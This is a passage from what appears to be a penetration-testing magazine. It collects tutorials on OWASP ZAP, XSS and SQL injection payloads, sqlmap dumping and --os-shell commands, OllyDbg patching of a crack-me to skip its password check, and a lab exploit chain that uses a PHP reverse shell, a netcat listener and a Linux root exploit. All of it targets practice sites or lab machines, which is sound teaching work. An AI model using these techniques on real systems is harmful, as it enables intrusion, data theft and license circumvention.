attack method, whereas Burp requires more in-depth understanding of its features and uses.
Some of the other tools available do not offer the same packaged capabilities as ZAP and Burp Suite
do, instead they are more focused on the individual topics. For example, Nikto and W3AF are used to
scan for known vulnerabilities and do not offer a proxy function. SQLmap is used to find and exploit
SQL vulnerabilities just like XSSer focuses on detecting Cross-Site Scripting vulnerabilities. As you
can see, there is no shortage of tools for a Penetration Tester, it really comes down to a matter of
preference and use case. ZAP utilizes the same techniques as some of the other tool while providing
all those features into one easy to install package. In the next section, we will discuss some of the
most common features in ZAP.
The latest version of ZAP is 2.4.3. ZAP can be installed on Windows, Linux, and Mac OS/X. ZAP
makes it easy for Penetration Testers and Security Professionals to locate vulnerabilities in web
applications with minimal intervention. Some of the features that ZAP offers are:
• Intercepting Proxy
• Automated Scanner
• Passive Scanner
• Brute Force Scanner
• Spider
• Fuzzer
• Port Scanner
One of the most useful features is the Quick Start feature. ZAP provides a complete list of potential
30
vulnerabilities in a web application, including what portion of the code is vulnerable. ZAP acts as a
non-transparent proxy, meaning that traffic is tunneled through while browsing the web application.
In addition to the non-transparent proxy features, ZAP also offers a way to assess the web application
through the Quick Start option. The Quick Start option uses a spider to actively crawl the web
application. ZAP has the ability to scan web applications both actively and passively, meaning data is
either manipulated or not manipulated.
Now that you have a little background on what ZAP can do, it’s time to download and install it. ZAP
can be installed on Linux, Mac OS/X, and windows which is available at
https://github.com/zaproxy/zaproxy/wiki/Downloads.
Once downloaded, click on the installer file (Figure 1).
After ZAP is installed, we need to generate ZAP SSL certificate. Since all communication is proxied
through ZAP, any sites using Secure Socket Layer (SSL) (HTTPS) certificates verification will fail and
the connection will be terminated. To generate the certificate, open ZAP and select tools, then
options. On the left hand side, select Dynamic SSL Certificates. Next, save the certificate so it can be
imported into the browser (Figure 2). The next section will explain how to configure Firefox with the
SSL Certificate.
31
(Figure 2). ZAP SSL Certificate.
For this article, we are going to configure Firefox but you can use any browser that you are more
comfortable with, just remember to configure it to connect through ZAP. As of this writing, the
current version of Firefox is 43.0.4. Now it is time to import the certificate. Open Firefox and select
the option menu. Once the menu is open, click on the advanced section, select the certificate tab, and
then view certificates. Once the certificate manager opens, select import and point the location to the
saved SSL certificate. Make sure to check all three boxes under the trust root Certificate Authority
(CA) (figure 3).
Now that the ZAP SSL certificate has been imported into Firefox we can proceed with pointing
Firefox to ZAP. To do so, we navigate to tools, options, then on the left hand side select advanced. On
32
the next screen, select Network, then Settings (Figure 4).
In the proxy section, we are going to enable manual proxy configuration, by default ZAP uses
127.0.0.1 as the HTTP proxy and 8080 as the port number (Figure 5).
Now that ZAP is setup, let’s take a look at a few of the different areas where you can pull information
and tweak settings. One of the most useful features is the filter section; when you browse the web
application, it is possible that you will pull in other pages that might not pertain to the application
you are testing. To clean up the field view in the menu, simply right click on the URL, select include
in context and then create new context. This option allows you to add the URL to in scope, meaning
ZAP will focus on that site. Right above the tree window there is a bullseye button that, when clicked,
will filter the tree view to only in scope items (Figure 6).
33
(Figure 6). Filter Option.
In addition to the filter and context options, you can also edit the field view on the below tabs to
include or exclude specific testing methods. By default, ZAP usually has the history, alerts, search
and alerts field displayed. You can add more by clicking on the green plus button and selecting from
a list of available fields (Figure 2). You can also remove the fields by clicking the small “x” on each
tab.
The gear icon on the top toolbar will open the options menu where you can tune some of the options,
such as active scanning threads, Fuzzer, Shortcut Keys and many other options (Figure 8). ZAP
certainly provides you with enough options and features to tweak it to your individual needs.
34
(Figure 8). Option Menu.
The last view that you need to understand for this tutorial is the request and response header fields
(Figure 9). This field allows you to see what types of HTTP requests have been sent to the web
application and the types of responses it provided back. This view is very important to understanding
what different types of techniques were used, such as SQL Injection or Cross-Site Scripting
parameters that have been sent to the web application.
At this point, Firefox will send all traffic through ZAP. Open up Firefox and navigate to URL
http://webscantest.com/crosstraining/products.php. This site was setup to test scanners as well as
the ability to test some common attacks, such as Cross-Site Scripting (XSS) and SQL Injections. After
35
you navigate to the products page, click on the shovel entry and select submit my review (Figure 10).
(Figure 10). Shovel Page.
At this point ZAP will have a directory structure as well as some alerts from browsing the website
(Figure 11). Under the alerts section, you will find that web browser XSS protection is not enabled. To
verify, we will attempt a Reflected Cross-Site Scripting attack into the description field on the shovel
review page (Figure 12).
36
(Figure 12). Cross-Site Scripting Example.
Once you enter the script into the description page, click the submit button (Figure 12). Click on the
back to reviews link on the bottom of the page. Once the page loads, you will see a dialog box pop up
with (‘XSS’). This type of attack is referred to as a Reflected Cross-Site Scripting (XSS) attack (Figure
13). Reflected Cross-Site Scripting (XSS) is also known as a non-persistent cross-site scripting attack.
The Reflected XSS vulnerability is one of the more common types of attacks seen today. This
vulnerability is present when HTML form submissions or HTTP queries are passed immediately to
server-side scripts without any proper input validation.
This test we just did helps validate that the web application is vulnerable to XSS attacks. Finally, we
can now view the attack in ZAP by clicking on navigation menu, selecting the product review sub
page and clicking on the POST:review.php(Submit, Description, Email, Name) entry (Figure 14). On
the right hand side, you will see an encoded version of the script we just injected into the description
field under the request header.
37
(Figure 14). ZAP POST View.
So there you have it. You now have learned some of the features that are useful when testing a web
application and how to setup ZAP to intercept traffic between Firefox and a web application as well
as one of the ways to verify a Cross-Site Scripting vulnerability.
Before we move onto the next section, it is important to note that you can also use ZAP for parameter
injections. Parameter Injections involve adding code into the parameter fields within the response.
This technique can be used to bypass client-side checks. To do so, you can utilize the ZAP break
feature to intercept a request, include the modified data and forward it back to the web application.
Now we will take a look at how this is done.
Browse to URL http://webscantest.com/crosstraining/aboutyou2.php put some information in the
about you section and click submit. You should see a POST entry in ZAP (Figure 14-1). Right Click on
the POST entry and select Break and click save (Figure 14-2).
38
(Figure 14-2) Manipulated Response Body.
Reload the page and create another entry, once you submit the about you, you will notice that ZAP
will flash, waiting for the response to be forwarded. Let’s go ahead and add the example JavaScript
that we used for the previous XSS attack. Click on the double arrow and watch as we inject the code
into the web application (Figure 14-3).
As you can see, we were able to get the same results as the previous exercise by displaying our alert
message of XSS. The last two exercises only scratch the surface as to what ZAP is capable of doing.
Penetration Testers must be able to overcome challenges they are faced with in order to ensure that
the web application has been properly tested. In the next section, we will discuss SQL Injections and
how we can leverage the fuzzer in ZAP.
Now that we have setup ZAP and had a chance to exploit an XSS vulnerability, let’s take a look at how
we can use ZAP to find and exploit a SQL vulnerability. Structured Query Language (SQL) is used to
query and administer databases such as Oracle, Microsoft SQL, and MySQL. A SQL Injection attack
involves modifying SQL statements in a malicious manner where they are entered into a field within
a web application. If input validation checks are not put in place, the SQL query can edit, delete, or
provide information from the backend database thus making this a very dangerous attack. In fact,
SQL injections are so common today that OWASP lists SQL Injections as number one. We will also
be using the Fuzzer to carry out our SQL Injection checks. The fuzzer is a technique that is used to
find code errors within the web application. It operates by attempting to inject random data into the
39
selected field, known as fuzzing.
Now, navigate back to ZAP and on the left side, we should see the site as well as a folder named
ShutterDB. Expand that folder and click on the POST entry. On the right hand side, you will notice
that within the response body we see name=Rake (Figure 16).
This is our search term listed in the response body. Right click on the word Rake and select Fuzz. A
dialog box will appear. Click on payloads on the right hand side (Figure 17).
40
(Figure 17). Fuzz Option.
Another box will appear. Now we need to direct the fuzzer what injection types we would like it to try.
Click on add, then select the drop down to file fuzzer. Expand the jbrofuzz directory and scroll down
to Injection then Oracle SQL Injection. (Figure 18).
Now we should see the payload in the box. Add it to the fuzzer, click ok. Now at this point, we
selected that we wanted to run the fuzzer against the search parameter Rake and selected the payload
Oracle SQL Injection. Click on start fuzzer. At the bottom of the ZAP screen, you can see the fuzzer
41
go through a bunch of checks which were included in the selected payload (Figure 19).
It is important to note that not all attempts will be successful. For this exercise, we are going to select
the line with ‘or ‘1’=’1. Directly above the history box you can also see the injection parameters
used in the response back to the web application. Now it’s time to see if that SQL injection will work.
We are going to type the below example into the search field on the website (Figure 20).
Once you type in the above command, click select. As you can see, we just caused the database to
dump a list of all the products, our injection was successful. ZAP offers many different types of
fuzzing techniques for the various SQL languages. The fuzzer is a good start for taking some of the
manual effort out of trying different SQL injection attacks. You can also compile a list of commands
for a custom fuzz scan, based on your specific needs.
42
SUMMARY
This article only touches the surface of OWASP Zed Attack Proxy (ZAP). ZAP has been proven to be a
very valuable tool in a Penetration Tester’s arsenal, not only because of the widely adopted support
but because of all the features which are very intuitive and easy to run. Tools like ZAP are truly
beneficial during the initial testing phase because it provides the Penetration Tester with detailed
information regarding the web application, hidden directories and potential vulnerabilities it has
found. In addition to intelligence gathering, ZAP is also capable of executing attacks on
vulnerabilities that are listed on the OWASP Top Ten. The more we rely on web applications, the
more likely it will be targeted for malicious intent. It is critical to understand how our browsers
interact with web applications and the different ways we can find critical flaws in the code. Finding
these flaws early on in the development lifecycle will help prevent web applications from releasing
private information that can hurt both the customer and business. The best way to achieve this is to
use the tools we have available both in the open source and commercial communities.
43
REFERENCES:
ON THE WEB
3. https://github.com/zaproxy/zaproxy/wiki/Introduction OWASP
ZAP Wiki page.
4. https://www.owasp.org/index.php/Category:OWASP_Top_Ten_P
roject#tab=OWASP_Top_10_for_2013 OWASP Top Ten List.
BIBOLIOGRAPHY
44
Journey to Reverse Engineering -
Unraveling key to software
reversing & malware analysis
by Samrat Das
● Source code is already available for the software, but proper documentation is no longer valid and requires
remodelling.
● No source code is available for the software, now the attempt of discovering possible source code for the
software becomes reverse engineering.
● The most interesting from a "hacker's" perspective is removal of copy protection ("cracking"), modifying
logic of code for arbitrary license acceptance (patching).
My focus will be on the third part, since it will be most fascinating for readers!
Malware Analysis is another interesting aspect reversing is used is for, which is the technique of reversing a
malware code to inspect its behavior and furthermore create a corresponding digital signature.
A reverse engineer’s toolkit is vastly based on many open source tools, as well as some closed source, however, in
simple terms we use: Debuggers, Disassemblers, and De-compilers.
My favorite tool is Ollydbg, an open source tool for reverse engineering, as well as an important ally in malware
analysis.
In this article, my focus will be on a hands-on tutorial for patching an exe file to accept any serial key!
• Ollydbg (http://www.ollydbg.de/)
• A crack-me for demonstration. You can download loads of crack-mes for hands-on practice from
http://crackmes.de/
45
Some important concepts:
A 32-bit application normally means software that uses the 32-bit linear address space (or flat
memory model) possible with the 80386 and later chips, while 64-bit applications are those software
using 64-bit address space for faster performance with modern hardware. Most computers still use
32bit applications since they can run on lesser hardware requirements and have legacy support.
2) Registers:
In a computer, a register is one of a small set of data holding places that are part of a computer
processor. A register may hold a computer instruction, a storage address, or any kind of data (such as
a bit sequence or individual characters).
32-bit data registers: EAX, EBX, ECX, EDX. Lower halves of the 32-bit registers can be used as four
16-bit data registers: AX, BX, CX and DX.
3) Disassembler:
A disassembler is a computer program that translates machine language into assembly language—the
inverse operation to that of an assembler.
4) Decompiler:
A decompiler is a computer program that takes as input an executable file, and attempts to create a
high level, compilable source file that does the same thing. It is therefore the opposite of a compiler,
which takes a source file and makes an executable.
5) Debugger:
A debugger or debugging tool is a computer program that is used to test and debug other programs.
6) Crackmes:
In simple words, a crack-me is a small program designed to test a programmer's reverse engineering
skills. They are programmed by other reversers as a legal way to "crack" software, since showing how
to crack commercial software is illegal; Crackmes are a great way to approach the same in legitimate
fashion.
Most of the commercial software is cracked in a similar fashion, though with recent higher end
software, the code is usually “obfuscated” or “packed” to prevent reversing (Simply
security-measures applied as anti-reversing).
Let me show you how a simple crack-me exercise, which has a particular serial key (obviously
unknown to me), can be patched for making it accept any serial key.
Just as a simple note, any application can be patched/ cracked in multiple ways. Some of the
situations I have worked on in the past included:
46
3) Decipher the serial-key generation and create a key-generator to produce infinite product keys
As you can see, here is a sample crack-me, “passwordapp.exe”. Upon clicking the application, it asks
us to enter a password for access.
As normally expected, we will get a warning due to wrong password: Not authorized.
Now to patch this exe, we open “Ollydbg” to fire up the same app inside the debugger to analyze it.
47
For beginners, here is a short intro to ollydbg, to help you get familiar with it.
1) CPU Window: The most frequent workplace where we will be working on as a step by step
flow for code analysis
2) Registers: The part of the window which contains the 32bit/ 64bit registers, and flag
information
4) Memory Stack: The stack display pane showing comments, and the address of memory.
Click File /Open and the below box will pop up, select the appropriate directory and launch the app
inside the debugger.
48
Once the application loads inside the debugger, we can see the app inside the windows with all the
assembly instructions visible.
As a part of our inspection, we need to run the application again, but this time inside the debugger to
inspect and analyze its responses. Go to debug menu -> and Click on Run. The application will again
run inside Ollydbg. As usual, the application is waiting for the user input for password.
49
To test the application logic, we will again enter a random password as input.
As soon as we again enter a random password, we are greeted with the same error as before.
However from a reverse engineer’s perspective, the secret is that the error will no longer be a fuss but
an ally for us!
In simple applications such as these, often THE KEY TO REVERSING IS FINDING THE
ERROR MESSAGE!
Here, just note the error message, which says we are unauthorized to use the application. Once we
close the error message, just right click inside the console window and Right click -> Search for-> All
referenced strings. Following this step is the reason, since now we will be hunting the error message,
which we just encountered.
50
clicking all reference strings, we will get a text box, where we will type the error message.
Once done, we get a window where all the ASCII strings of the application are present.
51
Once we double click on the message finding the window, we will be taken back to the main console.
Observing closely, go a little above the line of the error message looking for a jump instruction.
Here you can find the following instruction: “JE SHORT Password.00457728”
JE is a conditional jump which means that if the condition is right, then it will jump to 00457728,
which leads us to the message "You are not authorized to use the application" and if the condition is
not satisfied it just continues reading the code.
• Fill it with NOPs(No Operation) and make this conditional jump not work
52
• Change JE SHORT Password.00457728 to JNE SHORT Password.00457728,
JNE(Jump If Not Equal) means that if the password is correct, it will give you the bad
message and if the password is incorrect it will give you the correct message
53
Again, the application will ask us to enter the password, but this time the 1111 password which was
wrong, will be ignored by the application about its authenticity thus it will directly jump to the “you
are authorized” section demonstrating successful patching of the app.
54
Now to permanently modify the app to accept any password, simply save the modified exe.
Right click on code window-> "copy to executable" -> "All modifications" -> Copy all-> "Save file".
Reverse engineering is much more though, which includes dependency walker, PE (Portable
Executable), UPX Decompressions, Malware Analysis… huge and broad topics, which I will show in
later articles!
55
REFERENCES:
1. https://en.wikipedia.org/wiki/Reverse_engineering
2. http://www.ollydbg.de/download.htm
3. http://www.tutorialspoint.com/assembly_programming/assembly_regist
ers.htm
4. https://en.wikipedia.org/wiki/Debugger
5. https://en.wikipedia.org/wiki/Decompiler
6. https://en.wikipedia.org/wiki/Disassembler
56
HOW TO HACK WITH SQLMAP
Performing SQL injection
by Sumit Kumar Soni
SQL Injection is one of the top vulnerability in OWASP top 10. It has been around since the
1970s. Finding and exploiting SQLi needs a specialized skill set which requires deeper understat-
ing of web technologies, backend database and mechanism to retrieve data from DBMS, e.g.
Structured query language (SQL). Over time, the techniques for exploiting SQL Injection have
been improved. With the advent of programming languages, these techniques have been incor-
porated in the form of tools that can be used by naïve users.
INTRODUCTION
In today’s world, the Web and database technologies keep changing and the threat landscape is evolving and
possesses the risk of new vulnerabilities, whereas older vulnerabilities, like SQLi, are still prevalent. With the
help of automation tools, like SQLMAP, it’s becoming much easier for an attacker to exploit such vulnerabilities
while developers are still trying to fix the existing code. In this article, we will explore how to use SQLMAP
effectively to identify and exploit the SQLi without being worried about the nitty-gritty of SQL injection.
57
WHAT IS SQL INJECTION?
SQL injection is an injection attack wherein an attacker can execute malicious SQL statements that
control a web application’s database server.
SQLMAP is one of the most popular and powerful SQL injection automation tools out there. Given a
vulnerable HTTP request URL, SQLMAP can exploit the remote database and do a lot of hacking, like
extracting database names, tables, columns, all the data in the tables, etc. It can even read and write
files on the remote file system under certain conditions.
SQLMAP is included in pen testing Linux distros, like Kali Linux, BackTrack, etc. On other distros, it
can be simply downloaded from http://sqlmap.org/.
SETUP
For this article, we will be using the Kali Linux . Kali has SQLMAP pre-installed. The image
can be downloaded from https://www.kali.org/downloads/
I am using Samurai for vulnerable target. Its virtual machine can be downloaded from
https://sourceforge.net/projects/samurai/files/
For this this article, we are using a vulnerable script on Samurai. Its name is vulnscript. So
our target URL will be http://vulnscripts/sqli.php?name=a
BASIC TEST
This test will show if your target is vulnerable for SQLi or not.
Manual test : if we send name=’1 or 1=1 to our web application, we can clearly see that it gave us an
SQL syntax error and also gave away the database name. This is an indication that this application
can be vulnerable with SQLi.
58
With SQLMAP:- We can confirm our results with SQLMAP
sqlmap -u http://vulnscripts/sqli.php?name=a
In its output, the following line would indicate that the parameter name might be vulnerable and this
application is using mysql.
If we continue with our tests, it will show us crucial details about the exact version of the MYSQL and
also confirms that the parameter name is vulnerable to SQLi.
RECONNAISSANCE
For any pen testing project, the first step is to get as much as information we can get about
the target. Once we have confirmation that our target is vulnerable, we can utilize the
SQLMAP to get further information.
Database version:
With -b argument, SQLMAP can get the version information of the database.
sqlmap -u http://vulnscripts/sqli.php?name=a -b
Discover Databases:
Once SQLMAP confirms that a remote URL is vulnerable to SQL injection, and it is exploitable, the
next step is to find out the names of the databases that exist on the remote system. The "--dbs"
option is used to get the database list.
59
sqlmap -u http://vulnscripts/sqli.php?name=a --dbs
60
Get data from a table:
Now comes the most interesting part, extracting the data from the table. The command would be:
Notice here it also offers a dictionary based attack to crack the password hashes. SQLMAP will create
a CSV file containing the dump data for easy analysis. If we want to get data from a single column, we
can do it by using -C column name. For example, if we want to dump data from the id and login
columns, we have to use following command:
Note that we have used --is-dba to know if the current user has DBA privilege or not.
61
ADVANCE ATTACK WITH THE SQLMAP
So far, we have used SQLMAP to get the basic information about our user. We can leverage
SQLMAP to perform further attacks, like reading any file or executing any SQL statement.
Getting a shell:
You can use SQLMAP to get the shell from the target system using --os-shell option or you can
execute a system command using --os-cmd=OSCMD
62
Note that your mysql database user should be able to write the file on a web accessible location, or
else you may not be able to get the shell. If you are using the Samurai VM, then you have to tear
down mysql profile from the apparmor, or else apparmor would prevent mysql from writing the file.
Exploitation of SQL injection highly depends on the logic of the application and the way it parses and
supports the various parts of the HTTP request. SQLMAP can customize these parts in a request.
Attacking a GET method is simple but any application that uses the POST method and parameters in
POST method also can be vulnerable for SQL injection. To test a parameter in POST request, you
have to use --data option.
In many cases, simply running SQLMAP may not provide the desired results as SQL injection
may not be present in the URI Query parameter or some protection mechanism, like WAF,
might be blocking some SQL injection attacks. In such cases, we can increase the attack
surface by setting up --level and –risk parameters.
63
Level: SQLMAP supports up to five levels and each level increases the attack surface by including
more injection points and increases the number of requests and payloads.
Level Comments
1 Only Parameter of the request would be
tested
2 HTTP Cookie header values are also tested
Risk: This option requires an argument which specifies the risk of tests to perform. Here
are three risk values.
Risk Comments
We can instruct the SQLMAP on what the parameter or header are with –p option, which portion of
the URL with * and which parameter or headers we don’t want to test for sql injection with --skip
option
Note that we cannot use -p and --skip at the same time.
If you are not worried about the time and data destruction, then the following command will dump
all the data, in most of the cases. Note that I am using * in URI to provide another point for SQL
injection for SQLMAP and instructing it to skip the injection in the Host header as some websites
need a valid host header. Use this with your own risk.
SUMMARY
64
There are many tools to perform an SQL injection, but SQLMAP is the best one available out there.
Mastering it would reduce the total time required to pen test a web application significantly. Having
knowledge of techniques provides an extra advantage, as SQLMAP can be customized for your needs.
This is THE tool that every security professional must know in order to test SQL Injections.
65
Web Application Pene-
tration Testing
by Gilles Lami
Web application penetration testing has become particularly important nowadays. Web
applications, if not well secured, can offer attackers numerous ways to penetrate into
systems and networks, or ways to steal sensitive data, even without getting a shell
(command line) on the system. With the evolution of technologies, Web applications
became more and more complex, using more and more components (the age of only
using basic HTML is over), so the attack’s surface is greater and ways to attack these
systems are numerous. We can see the impacts in the news, when a web application has
been compromised, personal or sensitive data has been stolen and this information been
made public.
Introduction
In this article, we will see a chain of exploits used against a vulnerable web server application and the web server
system itself. Ready? So let’s begin.
Usually, there are several phases during a penetration testing. I will briefly describe the classical phases, as it is
not the core subject of this article, and then launch and describe the chain of exploits.
1. Reconnaissance
The goal of this phase is to gather a lot of information about the target, usually using “white” information sources
(i.e. information publically available). But we never get directly in touch with the target in this phase. For
instance, the DNS are used, social networks, etc.
The main goal of this step is to collect a lot of information that could be used in the further phases of the test. It
can be email addresses, employee names, job offers, etc. The information gathered can lead to possible guessable
logins, software names and versions used inside the company, even architectures in place.
66
2. Scanning
In this step, the target is solicited. Packets are sent to it and also received from it. In this phase,
vulnerabilities can be detected.
3. Gaining access
This phase speaks for itself. The target or network devices are penetrated by the use of one or several
vulnerabilities. Gaining access can also mean stealing information and data by circumventing a
database access by means of a SQL injection flaws, for instance. In this case, we don’t strictly speak
about gaining access directly on the server, but gaining access to the data.
4. Maintaining access
The goal of this phase is to demonstrate if it is possible to have a way of persistently having access to
the target(s) and then also be able to have time to bounce deeply inside the tested networks.
5. Covering tracks
During this phase, the pentester will try to take appropriate measures to erase all his tracks (reset
logs, remove installed tools, etc.) that could prove that the systems have been compromised.
In the present article, phases 2 and 3 of the pentest will be presented. The test has been conducted in
a lab, so phase one is out of context and wouldn’t give useful results. At the end of the test, the “root”
account of the server will be compromised. Covering tracks with a root account is quite easy,
administration skills and tools knowledge are usually sufficient. And if system logs are sent
on-the-fly remotely to another server, then covering tracks of the attack can be much more difficult
to achieve and could be the purpose of another article.
In this lab, a vulnerable web server specifically built for pentesting purposes has been used:
Hackademic.RTB1.
67
Figure 1 - Vulnerable server used
The platform used to conduct the pentest is the famous Kali Linux distribution.
2. Finding a Wordpress access on the server and use it to upload a reverse back-shell.
3. Use the back-shell to have a command line access get the Linux version and kernel
version.
4. Use of this information and the Wordpress server to upload an escalation privilege
program.
5. Use the back-shell and a C compiler present on the server to compile the escalation
program.
6. Finally, get “root” and then access to sensitive data on the server.
SQL Injection
An SQL Injection vulnerability is a vulnerability located at the application level (layer 7 of the OSI
model).
By browsing the web server, we can detect an SQL injection flow by simply adding a special character
inside the URL. See in the picture below the apostrophe inside the URL and also the result, showing
that there is a SQL error and also that Wordpress is used.
68
Figure 2 - SQL Injection detected
We then use the sqlmap tool in order to get backend database information.
Below the command launched:
69
Figure 4 - Sqlmap exploitation 2
As we can see, there are three databases we can try to exploit. We will choose the Wordpress
database. Again with sqlmap:
The results:
The results :
70
Figure 6 - Sqlmap exploitation 4
We then dump the content of the tables wp_users, user_level, user_login and user_pass:
–C user_level,user_login,user_pass --dump
71
Sqlmap automatically found password hashes and proposed to perform a dictionary attack. We
indicate a password dictionary file (file with a list of passwords. Easily downloadable from the
Internet) and launch the attack.
We found several accounts and the account “GeorgeMiller” with a level of 10.
This level means administrator rights in Wordpress.
We know that the web application hosts Wordpress, and we have an administrator account and
password. We will now locate the Wordpress login page. We could try different ways, but in this
article, we will use “dirbuster”. This tool, also part of the Kali Linux distribution, is a powerful tool to
brute force web server’s directories or file names.
Figure 9 – Dirbuster
72
We succeed into getting the Wordpress login page. See below.
With the Wordpress login page identified, and with a cracked user account, we are now able to
connect inside Wordpress.
Inside the Wordpress administration portal, we configure Wordpress to allow upload of “c” and
“php” files:
73
Figure 12- Wordpress admin configuration
We are not able to upload files. We will upload a “reverse php webshell” to penetrate inside the web
server and to have a command line.
The PHP reverse shell is configured to connect back to the pentester attack machine on the TCP port
443 (see figure below.)
74
This port is usually allowed by firewalls, from the Internet to the web server, but also sometimes
(quite often) from the web server or the internal networks to the Internet. The reason is because TCP
port 443 is the default HTTPS port.
75
On the attacker’s machine, we start a listener on TCP port 443 in order to be able to accept the reverse
connection. To achieve this in a simple way, we use the “netcat” (“nc”) tool:
Figure 16 – Netcat
Then we click on the upload button in the Wordpress administration page (see above.)
The file is uploaded and we also see where it is located on the web server:
“/Hackademic_RTB1/wp-content/phpreverseshell.php”
http://192.168.0.35/ Hackademic_RTB1/wp-content/phpreverseshell.php
A simple command “id” tells us that we are logged in as “apache”. This user has very few rights so we
have to escalate our privileges. The banner shows us that the victim machine runs under Linux 2.6.31.
Inside our Kali machine, we search for an exploit to escalate our privileges.
76
Figure 19- searchsploit - privilege escalation
We find a program, written in the C language, able to escalate our privilege on the machine. With
Wordpress, we upload it inside the victim’s machine. We now return to our command line shell
inside the web server, and then perform a “cat /etc/passwd” to retrieve the location of the web
server’s root directory:
We go into /var/www and then to the location of our “15285.c” program (same sub-location as our
php reverse shell).
77
We now run it and finally get the root account:
Conclusion
If some of these points had been considered, for instance, if the Linux server system had been
correctly patched, if the web application been audited (following the OWASP methodology, for
instance), if the Wordpress admin password had been hardened, if the Wordpress software was not
reachable from the outside, and finally, if TCP port 443 was not allowed from the web server to the
internet, then the exploit would have been much more difficult to achieve.
We could also think that if the first entry point (SQL injection) was not possible then the entire
exploit would have rapidly failed. However, one of the goals of this article was to show a chain of
exploits, and show why it is important to have good security habits and fix as many security flaws as
you can, as soon as possible.
78
ABOUT THE AUTHOR:
79
Web applications in
the modern world
by Hashem Ahmad
Today, a lot of our life actions are online; different kinds of shopping, Internet banking
and financial transactions, social communication with our friends, TV shows, and a lot
of universities are uploading their academic courses to the web. Examples are
numerous, and the number of companies whose existence totally relies on web
applications is increasing everyday; Facebook, Twitter, Ebay, Uber and many, many
more companies that are nothing but a web application. That’s why the market today is
paying close attention to protecting web applications and the underlying infrastructure,
because it’s not just about service temporary interruption or data leakage; for some
companies, an exploited vulnerability in their application could make them going
totally out of business.
Before we start talking about this article’s main topic, let’s have a brief introduction about the Web.
The Hypertext Transfer Protocol (HTTP) is an application-level protocol for distributed, collaborative,
hypermedia information systems. It is a generic, stateless, object-oriented protocol which can be used for many
tasks, such as name servers and distributed object management systems, through extension of its request
methods.1
It was first used on 1990, HTTP version 0.9. Version 1.0 defined in IETF RFC 1945, and then version 1.1 in 1997.
HTTP version 2.0 was published last year, 2015, in RFC 7540.2
To keep it short, HTTP is the basic engine of the web and it consists of a series of:
• Requests sent from the client to the web application/server
• Responses back from the server to client
HTTP Request:
When you open your web browser (client) and ask for a website, your browser sends an HTTP request to the
server with the following items, called headers:
80
1. HTTP Method: defines what the client needs
2. Host: the domain you are trying to access
3. Resource: the page under this domain that you are requesting
4. Version: HTTP version
5. Other optional headers such as client version, language
HTTP Response:
When the client sends a request to the server, the server responds back with an HTTP response. The
first line of this response is a status code, when the client reads this code, it understands how to
handle the remaining received data. The following are the most common status codes:
• 200 OK: Request processed successfully
• 404 Not found: Requested resource was not found
• 500 Internal Server error
In general, 1xx codes are informational, 2xx indicates success, 3xx for redirection, 4xx client side
error, and 5xx server side error.
HTML is the language used to create web pages, basically text files, that can be rendered by a web
browser to be translated into graphic contents. HTML tags are the building blocks of a web page or
an application, and when a browser gets the HTTP response, it interprets the tags, and it already
understands what the function is of each one of these tags, then translate it into visual contents.
81
You can view a sample of any page by viewing its source, and see a lot more tags.
JavaScript
Building a website using only HTML tags could be very tedious work, and will not provide you with
all the granularity functions provided by other technologies, like CSS and JavaScript.
JS is an interpreted programming language, supported by all modern web browsers, and it became
an essential component in modern web technology.
Cookies
These are files sent between a web client and a server, to make the server capable of differentiating
between its different clients. When a client connects to a web server, the server assigns each client its
own unique cookie, even if two users who share the same public IP address are requesting the same
web page.
There are many attributes in a cookie: Name, Value, Domain, Expiry date and time, HTTPOnly flag,
Secure flag.
In 2013, cross Site Scripting, XSS, was identified as number three in OWASP TOP10 web application
security risks.34
Selection methodology for this list is based on the likelihood of the application having a vulnerability,
likelihood of it being discovered, likelihood of it being exploited, and the technical impact if
exploited. This gives us an indication about how important and how risky it is to find an XSS
vulnerability in your application.
XSS vulnerabilities exist when the user supplies input to the application. If this input is not validated
(sanitized) by the server, and if it contains malicious characters, as we will see, then it may be stored
(injected) eventually in the page code, and further reflected to other legitimate users when they
request the same web page.
82
the HTTP request itself sent by the victim to the server.
When the victim clicks on the link, the malicious HTTP request is sent to the
vulnerable server, reflected back on the browser, and executed by the browser.
Although XSS vulnerabilities exist in the web application, most of the time, an attacker uses XSS to
target the victim's (legitimate users), not to target the application itself. It could result in session
hijacking, user’s redirection, hijacking browsers, and, of course, web site defacement.
A third type for XSS attacks is Document Object Model (DOM) based attacks, this kind of XSS
actually is not changing anything in the web application/server itself as in the previous two types,
and the payload is not seen in the response, rather, it exploits the HTML document DOM at client
side due to inappropriate handling of the data from the associated DOM.
XSS Detection
Now let’s have a look at XSS detection. A web site XSS vulnerability could be tested in any input field
in the page (search field, insert comment field…etc.), or by testing URL parameters. Mainly, you test
by injecting a JavaScript tag; if there is a vulnerability in this input field or URL, your get will get
injected in the page HTML source code, then will be executed successfully, if the script is not
executed, you can check why it fails by viewing the new page source.
In this section, we are going to test URL parameters using pentesterlab.com - vulnerable by design –
application called “Web for pentester”, many thanks to Louis Nyffenegger in providing this great
effort.
When you open the 1st exercise, you will find a part in the URL that says:
Example1.php?name=hacker
Hello hacker
This means that the value part (hacker) of the parameter (name) in the URL, is reflected in the page
body, so we will try to inject our JavaScript in the parameter value, but let’s have a quick look at the
page HTML source code before injecting any JS code:
83
At the end of the code, you can see the word “Hello hacker” in the body, then the closing body and
html tags are there without any JS tags. Now let’s start testing and injecting JS tags in the URL:
As you can see, I removed the value “hacker” from the URL, instead, I typed
<script>alert(“vulnerable”)</script>
When I hit enter, the script runs successfully, and the JavaScript alert appeared in a popup with the
word I typed in my injected code “vulnerable”, this indicates that this parameter value in the URL is
passed to the application without any sanitization/filtering, thus, it’s vulnerable to XSS attacks. Let’s
have a look at the source code after injection to see what has happened:
84
The script tags are clearly inserted in the page successfully.
I tried the same tag <script>alert(“vulnerable”)</script> but no alert popped up this time, instead,
the body became Hello (“vulnerable”) Our guess is that the application filtered out the <script> and
</script> tags, so we have to look at the code and check the failure reason:
Now it’s confirmed that the app sanitized <script> tags, but what if we try to capitalize some letters
in <script> tag? Let’s try to modify our injected value and make it
<sCriPt>alert(1)</ScRipt>
85
Aha! The script passed, this verified that the application is filtering for the specific tags <script> and
